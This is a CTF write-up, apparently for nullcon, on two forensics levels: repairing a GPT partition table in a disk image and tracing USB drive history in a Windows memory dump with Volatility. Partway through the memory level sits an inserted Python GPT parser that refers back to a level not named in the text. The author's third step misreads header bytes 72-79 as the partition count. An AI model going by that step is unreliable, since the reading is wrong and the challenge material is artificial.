Analysis: Yet another level that kept me away from doing anything else. Merely a 20 KB file, but it may require 20 hours to understand for a newbie like me. I started with Google on partition forensics and ended up at the GUID Partition Table page on Wikipedia; a long story, I would probably speak about it some time later (Evil Mind). So the first thing we required for this challenge was some boot record parsers. I got them at http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts, which I extracted to a folder.
1. I parsed the GUID Partition Table (GPT) header of the file image.dd using GPTparser.pl. Result of parsing: (screenshot)
2. Coming back to Wikipedia, there was a header format for LBA 1: (table)
3. So, comparing offset 072-079 of image.dd with the one in the table, we can conclude that there are 9 partitions (2 primary copies as mentioned, and 7 between 72-79).
4. It had also been mentioned in the description that the LBA size was 512 bytes, and in our image.dd we can observe from the parsing result that the partition table starts at offset 80. Hence the next LBA will be at 512+80 = 592.
5. Now it was time for some hex editing. I opened image.dd and traversed to position 592 (250h). Since we had concluded in our earlier steps that there were 9 partitions, we had to edit the location from 00 to 09.
6. Now again we had to parse the modified image.dd.
7. As in step 1, and we got all our 9 partitions.
8. The next step was to observe the GUID from the result and match it against the table on Wikipedia to find out the partition type.
9. Finally, the LBAs thus obtained were not arranged in order, and we had to arrange them in ascending order so as to obtain the flag.
Flag:

Forensics Level 5: Universal Swindlers Bayonet

Official Hint:
Page Source: <!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->
Description: Anusandhaanic Daakus Ltd. is a company whose strength lies in the researches it conducts. Very often the employees leaving the organisation manage to carry the research data along with. This time company decided to go for the investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump. You as an investigator are required to find out the following information from the dump:
1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe
Analysis: This level was all about memory dump investigation. As usual I had to look up some memory dump analysis tool on Google. I came across Memoryze and Audit Viewer. I installed them and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a wizard, which I followed. After a while I got the results in a simply formatted way. I tried going through the windows but couldn't find anything much relevant, and ended up getting only the last flag.
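For the Intriguing MBR level above, the steps depend on a third-party parser plus a hex editor. As an added example (not the Perl script the author used), the Python below parses the primary GPT header and entry array directly, using the field layout from the UEFI specification: bytes 72-79 of the header hold the starting LBA of the partition entry array, and bytes 80-83 hold the number of entries, which is the field at image offset 592 (512+80) that step 5 restores. When that count field is zeroed, as in the damaged image, the parser falls back to scanning every entry slot present in the file for a non-zero partition type GUID. It then answers the level's three questions: it lists the partitions sorted by starting LBA and computes the unpartitioned ranges between them. The image is constructed for the example with well-known partition type GUIDs; the CRC32 fields are left zero and not validated, since a damaged header fails them anyway.

```python
import struct
import uuid

SECTOR = 512  # LBA size given in the challenge description
GPT_SIGNATURE = b"EFI PART"
ZERO_GUID = b"\x00" * 16
# Well-known partition type GUIDs (lowercase, as str(uuid.UUID) prints them).
EFI_SYSTEM = "c12a7328-f81f-11d2-ba4b-00a0c93ec93b"
LINUX_DATA = "0fc63daf-8483-4772-8e79-3d69d8477de4"
LINUX_SWAP = "0657fd6d-a4ab-43c4-84e5-0933c84b4f4f"


def parse_gpt_header(image):
    """Fields of the primary GPT header at LBA 1 (offsets per the UEFI spec)."""
    hdr = image[SECTOR:2 * SECTOR]
    if hdr[:8] != GPT_SIGNATURE:
        raise ValueError("no EFI PART signature at LBA 1")
    first_usable, last_usable = struct.unpack_from("<QQ", hdr, 40)   # bytes 40-55
    (entries_lba,) = struct.unpack_from("<Q", hdr, 72)               # bytes 72-79
    num_entries, entry_size = struct.unpack_from("<II", hdr, 80)     # bytes 80-83, 84-87
    return {"first_usable": first_usable, "last_usable": last_usable,
            "entries_lba": entries_lba, "num_entries": num_entries, "entry_size": entry_size}


def parse_partitions(image):
    """Partition entries sorted by starting LBA.

    The entry count is taken from the header when it is non-zero; if that field
    was wiped (the damaged image in this level), every slot that fits in the file
    is examined and empty slots (all-zero type GUID) are skipped.
    """
    h = parse_gpt_header(image)
    entry_size = h["entry_size"] or 128
    array_off = h["entries_lba"] * SECTOR
    count = h["num_entries"] or (len(image) - array_off) // entry_size
    parts = []
    for i in range(count):
        entry = image[array_off + i * entry_size: array_off + (i + 1) * entry_size]
        if len(entry) < entry_size or entry[:16] == ZERO_GUID:
            continue
        first_lba, last_lba = struct.unpack_from("<QQ", entry, 32)   # entry bytes 32-47
        parts.append({
            "slot": i,
            "type": str(uuid.UUID(bytes_le=entry[:16])),  # GPT GUIDs are mixed-endian
            "first_lba": first_lba,
            "last_lba": last_lba,
            "name": entry[56:128].decode("utf-16-le").rstrip("\x00"),
        })
    parts.sort(key=lambda p: p["first_lba"])
    return parts


def unpartitioned_gaps(parts, first_usable, last_usable):
    """(start, end) LBA ranges inside the usable area covered by no partition."""
    gaps, cursor = [], first_usable
    for p in parts:
        if p["first_lba"] > cursor:
            gaps.append((cursor, p["first_lba"] - 1))
        cursor = max(cursor, p["last_lba"] + 1)
    if cursor <= last_usable:
        gaps.append((cursor, last_usable))
    return gaps


def _entry(type_guid, first, last, name):
    e = bytearray(128)
    e[0:16] = uuid.UUID(type_guid).bytes_le
    e[16:32] = uuid.UUID(int=first).bytes_le  # any non-zero unique GUID will do here
    struct.pack_into("<QQ", e, 32, first, last)
    e[56:56 + 2 * len(name)] = name.encode("utf-16-le")
    return bytes(e)


def build_sample_image(num_entries_field=0):
    """Constructed 20-sector image; the default zeroed count mimics the damaged header."""
    hdr = bytearray(SECTOR)
    hdr[0:8] = GPT_SIGNATURE
    struct.pack_into("<II", hdr, 8, 0x00010000, 92)   # revision 1.0, header size
    struct.pack_into("<QQ", hdr, 24, 1, 2047)         # current LBA, backup LBA
    struct.pack_into("<QQ", hdr, 40, 34, 2014)        # first / last usable LBA
    hdr[56:72] = uuid.UUID("12345678-1234-5678-1234-567812345678").bytes_le
    struct.pack_into("<QII", hdr, 72, 2, num_entries_field, 128)  # array LBA, count, size
    entries = b"".join([                              # deliberately out of LBA order
        _entry(LINUX_DATA, 1024, 1535, "data"),
        _entry(EFI_SYSTEM, 34, 545, "boot"),
        _entry(LINUX_SWAP, 600, 1000, "swap"),
    ])
    return (bytes(SECTOR) + bytes(hdr) + entries).ljust(20 * SECTOR, b"\x00")


if __name__ == "__main__":
    img = build_sample_image()
    h = parse_gpt_header(img)
    parts = parse_partitions(img)
    for p in parts:
        print(p["slot"], p["type"], p["first_lba"], p["last_lba"], p["name"])
    print("gaps:", unpartitioned_gaps(parts, h["first_usable"], h["last_usable"]))
```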
Again I went through various links and came across a tool named Volatility. I installed it and played with it for a while. With the following working steps I got the rest of the flags:
1. I tried to locate the registry hive where we could find the external drive information.
2. The second-last registry hive was supposed to store all the drive information.
3. I dumped the second-last hive and got a very long list of registry information.
4. The challenge was to look for the external drive information. I went through a few analysis articles and found that the USBSTOR key stores the external USB drive information.
5. Hence I ended up with the following command and got the result successfully. (screenshot)
6. But still the flag was not yet complete: the page source revealed that the expected time must be in IST, hence we had to add +5:30 to the times when the drive was first connected and last disconnected.
Flag:

Finally, Near The End, A Few Words:
- All the links and tools mentioned above were functioning during this write-up, and I cannot assume they will keep working throughout.
- I apologize for any grammatical mistakes or for my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree with the fact that there can be much better ways to solve the above challenges, but eventually my ideas worked out.
- Wish Happy Hacking to Everyone.
- End, Regards To All The Members of NULL.
The epic story ends here.....
~$-THE END-$~